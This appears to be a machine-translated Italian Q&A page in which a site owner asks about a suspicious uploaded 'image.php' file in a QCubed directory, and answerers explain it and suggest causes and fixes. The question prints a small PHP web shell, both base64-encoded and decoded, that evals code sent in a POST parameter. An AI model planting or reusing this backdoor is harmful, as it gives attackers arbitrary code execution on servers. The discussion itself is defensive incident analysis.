1. casa
  2. Domanda e risposta
  3. Cosa eval in Base64 codificato $ _POST [ 'e'] variabile effettivamente fare?

Cosa eval in Base64 codificato $ _POST [ 'e'] variabile effettivamente fare?

2010-11-22 19 views
9

Ok, ecco cosa ho cercato su google:

Sembra che ci sia un file caricato denominato "image.php" che viene caricato in una directory qcubed.

Quel file image.php contiene il seguente codice Base64:

aWYoaXNzZXQoJF9QT1NUWydlJ10pKWV2YWwoYmFzZTY0X2RlY29kZSgkX1BPU1RbJ2UnXSkpO2VjaG8gJzMxMzkzNjJlMzIzMzMxMmQzMTM3MzIyZTMyMzgzYTY5NjY2MTYzNjU3MjZkNzA3NTYyNmQ2OTYzNjUzYTYxNjY2MTYzMzQzMjY1NzI2OTMwMzInOw==

decodificati si aggiunge a questo:

if(isset($_POST['e'])) 

eval(base64_decode($_POST['e'])); 

echo '3139362e3233312d3137322e32383a6966616365726d7075626d6963653a6166616334326572693032';

Ricerca per la stringa in output ho trovato vulnerabilità qcubed simillar su altri siti.

Decodifica l'ultima stringa con echo ho ottenuto:

196.231-172.28:ifacermpubmice:afac42eri02

che davvero don`t capire ciò che fa (utilizzando: http://ostermiller.org/calc/encode.html).

Può cortesemente spiegare che cosa, in particolare, di fronte I`m qui? Quale vulnerabilità di sicurezza dovrei indirizzare per risolvere questo problema?

fonte

2010-11-22 Gabriel

+0

Ho scoperto cosa potrebbe contenere, sembra che assomigli alla struttura del file passwd, dare un'occhiata qui http://www.regatta.cmc.msu.ru/doc/usr/share/man/info/ru_RU/ a_doc_lib/files/aixfiles/passwd.htm, forse questo aiuterà qualcuno. – Gabriel

+0

Hai detto che hai caricato su una directory qcubed. Puoi spiegare cosa intendi con una directory "qcubed"? –

+0

@VaibhavKaushal QCubed è un quadro e la directory qcubed in non-essenziale. – Gabriel

risposta

5

Lo script eseguirà qualsiasi codice PHP ottenuto dalla variabile POST e, che ovviamente è una vulnerabilità orribile e pericolosa.

La dichiarazione echopotrebbe essere essere una conferma per lo script di attacco che la versione corretta è installata o qualcosa del genere.

Tuttavia, questo è solo pericoloso se il file image.php può anche essere eseguito in quella directory. È difficile dare consigli su cosa fare senza sapere come è arrivato il file in primo luogo.

fonte

2010-11-22 13:00:25

+0

Questo è esattamente. In realtà non so come sia arrivato, sembra che siano state interessate altre directory da qcubed. Ad ogni modo, non è possibile accedere direttamente alla directory e quindi al file, a meno che questo attacco non venga mescolato con qualche altro attacco che non ho ancora scoperto a riguardo. Qualche consiglio, consiglio? Un'altra cosa che ho fatto è limitare la directory solo all'area locale da una clausola limite con un .htaccess dedicato nella directory root qcubed. Ancora una volta, qualche consiglio e consiglio? – Gabriel

+0

@Gabriel difficile dire: Potrebbe essere che una vulnerabilità in Gcubed è stato utilizzato per piantare i file in ogni directory possibile. Potrebbe anche essere stata una violazione in qualche altra applicazione web (una versione di Wordpress obsoleta sarebbe un probabile colpevole). Se fosse il tuo account FTP a essere compromesso, difficilmente l'hacker si sarebbe preso la briga di copiare i file in modo scrupoloso - non posso saperlo con certezza, certo, ma in realtà ha l'odore di una vulnerabilità sfruttata da uno script. Forse guardi nei forum di Gcubed se esistono eventuali vulnerabilità note –

+0

Assicurati che anche i file caricati non possano essere inclusi dagli script legali (ad esempio utilizzando l'input dell'utente non convalidato), sfortunatamente questo non può essere limitato con htaccess. –

2

Molto probabilmente uno script kiddie utilizzato un exploit di entrare nel vostro sito. Assicurati che l'applicazione e le librerie PHP siano aggiornate.

fonte

2010-11-22 21:24:27 rook

Problemi correlati

 Problemi correlati